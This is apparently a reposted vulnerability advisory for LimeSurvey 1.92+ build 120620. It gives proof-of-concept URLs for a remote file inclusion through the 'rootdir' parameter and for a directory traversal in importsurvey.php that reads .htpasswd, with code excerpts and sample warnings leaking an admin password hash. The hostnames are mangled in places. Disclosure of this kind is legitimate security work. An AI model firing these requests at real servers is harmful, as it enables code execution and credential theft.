发现者 dun \ posdub[at]gmail测试数据 [ LimeSurvey 1.92+ build 120620 ] Multiple Vulnerabilities # 影响程序: "LimeSurvey - the free and open source survey software tool" 官网: http://HdhCmsTestlimesurvey.org/ 下载 地址: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip # [RFI] ( allow_url_include = On; register_globals = On; ) 影响版本: 1.92+ build 120620 测试: http://HdhCmsTest2cto测试数据 /limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt? File: ./limesurvey/replacements.php (line 3) ...cut... <?php global $rootdir; include_once($rootdir.'/classes/expressions/LimeExpressionManager.php'); // [RFI] ...cut... # [目录遍历] ( display_errors On; register_globals = On; ) 影响版本: 1.92+ build 120620 and previous # 测试: http://HdhCmsTest2cto测试数据 /limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=secret/.htpasswd File: ./limesurvey/admin/importsurvey.php (lines 18-38) ...cut... if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom'])) // 1 false if $copyfunction is set { die("Cannot run this script directly"); } require_once('import_functions.php'); // 2 include functions if (!isset($copyfunction)) { $sFullFilepath=$the_full_file_path; $aPathInfo = pathinfo($sFullFilepath); $sExtension = $aPathInfo['extension']; } $bImportFailed=false; if (isset($sExtension) && strtolower($sExtension)=='csv') { $aImportResults=CSVImportSurvey($sFullFilepath); } elseif (isset($sExtension) && strtolower($sExtension)=='lss') // 3 true if $sExtension = 'lss' { $aImportResults=XMLImportSurvey($sFullFilepath,null,null, null,(isset($_POST['translinksfields']))); // 4 $sFullFilepath -> our file ...cut... File: ./limesurvey/admin/import_functions.php (lines 1080-1087) ...cut... function XMLImportSurvey($sFullFilepath,$sXMLdata=NULL,$sNewSurveyName=NULL,$iDesiredSurveyId=NULL, $bTranslateInsertansTags=true) { global $connect, $dbprefix, $clang, $timeadjust; $results['error']=false; if ($sXMLdata == NULL) { $xml = simplexml_load_file($sFullFilepath); // 5 try to open our file as xmlfile ...cut... This should return a warning with the first line of our file. In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1k vc 5/ from .htpasswd :) Something like this: Warning: simplexml_load_file() [function.simplexml-load-file]: secret/.htpasswd:1:parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087 HdhCmsTest2cto测试数据 Warning: simplexml_load_file() [function.simplexml-load-file]: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087 Warning: simplexml_load_file() [function.simplexml-load-file]: ^ in /www/limesurvey/admin/import_functions.php on line 1087 ##
查看更多关于LimeSurvey 1.92+ build120620多重缺陷及修复 - 网站安全的详细内容...